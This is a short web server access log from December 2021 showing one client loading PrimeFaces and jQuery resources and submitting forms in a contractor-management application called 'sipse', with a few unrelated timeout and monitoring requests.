186.84.90.195 - - [23/Dec/2021:05:40:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:32 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:32 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:32 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.84.90.195 - - [23/Dec/2021:05:40:48 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/expedirExperienciaIdoneidad.xhtml HTTP/1.1" 200 22811
186.84.90.195 - - [23/Dec/2021:05:40:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:40:54 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
66.249.79.236 - - [23/Dec/2021:05:41:02 -0500] "-" 408 -
216.245.221.92 - - [23/Dec/2021:05:41:04 -0500] "HEAD / HTTP/1.1" 200 -
186.84.90.195 - - [23/Dec/2021:05:42:57 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.90.195 - - [23/Dec/2021:05:42:57 -0500] "POST /sipse/faces/presentacion/financiero/estudioPrevio/personalSolicitado/asociarExperienciaContratista.xhtml HTTP/1.1" 200 53535
186.84.90.195 - - [23/Dec/2021:05:42:58 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
